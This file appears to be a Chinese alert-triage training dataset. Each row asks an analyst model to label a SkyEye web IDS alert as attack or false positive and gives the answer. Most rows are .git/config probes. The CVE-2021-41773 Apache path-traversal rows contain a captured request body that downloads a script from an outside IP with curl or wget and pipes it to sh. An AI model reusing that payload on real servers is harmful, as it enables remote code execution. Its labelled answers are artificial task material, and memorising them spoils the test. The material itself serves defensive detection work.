你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732687891", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732687891, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "3.251.68.146", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 48168}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTEyLjAuMC4wIFNhZmFyaS81MzcuMzYgRWRnLzExMi4wLjE3MjIuNDgNCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.17", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.17/.git/config", "first_access_time": "2024-11-27 14:11:31", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "爱尔兰--都柏林郡--都柏林", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "ed76a8783a557f386e5eae5b62552cb3", "proto": "http", "xff": "", "alarm_id": "20241127_c14eaa673e1135acbdf89008f7026de9", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 14:11:31", "attack_addr": "爱尔兰--都柏林郡--都柏林(53.349764/-6.260246)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732687870", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "3.251.68.146", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.17\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "3.251.68.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Edge/112.0.1722\", \"hw_type\": \"PC\"}}", "host_md5": "8e92c0757fd0b686d9fd85100838e2b6", "sport": "48168", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732687769", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732687769, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "3.251.68.146", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 55122}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuOTMgU2FmYXJpLzUzNy4zNg0KQWNjZXB0LUNoYXJzZXQ6IHV0Zi04DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkNvbm5lY3Rpb246IGNsb3NlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.12", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.12/.git/config", "first_access_time": "2024-11-27 14:09:29", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "爱尔兰--都柏林郡--都柏林", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "0898db9054555f6ef5fd7c5e6207f820", "proto": "http", "xff": "", "alarm_id": "20241127_10add3bc758a597dccecd62fb75d41e7", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 14:09:29", "attack_addr": "爱尔兰--都柏林郡--都柏林(53.349764/-6.260246)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732687747", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "3.251.68.146", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.12\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "3.251.68.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome/90.0.4430\", \"hw_type\": \"PC\"}}", "host_md5": "8b2f76fd124ba4f8b9f28987a4504f66", "sport": "55122", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732687708", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732687708, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "3.251.68.146", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 43406}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTEyLjAuMC4wIFNhZmFyaS81MzcuMzYgRWRnLzExMi4wLjE3MjIuNjQNCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.16", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.16/.git/config", "first_access_time": "2024-11-27 14:08:28", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "爱尔兰--都柏林郡--都柏林", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.222", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "3a9c422988da3a03e189bf557d17f815", "proto": "http", "xff": "", "alarm_id": "20241127_8311988f5fe5d521659a6b7039562a0a", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 14:08:28", "attack_addr": "爱尔兰--都柏林郡--都柏林(53.349764/-6.260246)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732687688", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "3.251.68.146", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.16\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.64\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "3.251.68.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Edge/112.0.1722\", \"hw_type\": \"PC\"}}", "host_md5": "5704a8d93ab5f08f2d5f86217a1377f4", "sport": "43406", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.64"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732686000", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732686000, "vuln_harm": "当WEB服务路境外的文件未被设置为“Require all denied”时,攻击者可利用该漏洞读取任意系统文件。当服务器启用了Mod_CGI模块时,攻击者可利用该漏洞调用任意系统二进制文件,包括远程执行系统命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "", "hit_end": 28, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "rsp_status": 0, "code_language": "", "solution": "由于该版本的后续版本 2.4.50 存在该漏洞未完全修复导致的新漏洞,故需更新系统至 2.4.51 及以后版本。", "hit_start": 8, "detail_info": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "xff": "", "sip": "111.67.205.93", "vuln_desc": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "public_date": "2021-11-15 10:39:08", "sport": 53352}, "detail_info": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 13:40:00", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "6263de24273207993fd67a3f9466170e", "xff": "", "vuln_desc": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "attack_chain": "0x02020000", "vuln_harm": "当WEB服务路境外的文件未被设置为“Require all denied”时,攻击者可利用该漏洞读取任意系统文件。当服务器启用了Mod_CGI模块时,攻击者可利用该漏洞调用任意系统二进制文件,包括远程执行系统命令。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732685979", "code_language": "", "public_date": "2021-11-15 10:39:08", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "28", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020e07", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.67.205.93", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "由于该版本的后续版本 2.4.50 存在该漏洞未完全修复导致的新漏洞,故需更新系统至 2.4.51 及以后版本。", "hit_start": "8", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.12:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_73ae2619e6cced371d124d97a7e1c039", "access_time": "2024-11-27 13:40:00", "content-length": "103", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "111.67.205.93", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.12:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570119-Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "53352", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732686000", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732686000, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "通用", "hit_end": 253, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 233, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "111.67.205.93", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 53352}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 13:40:00", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "6d6b55bf3575e5f55998bd56f7afe823", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732685979", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "253", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.67.205.93", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "233", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.12:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_03b6b292bd3a4259757041cd15fd735f", "access_time": "2024-11-27 13:40:00", "content-length": "103", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "111.67.205.93", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", 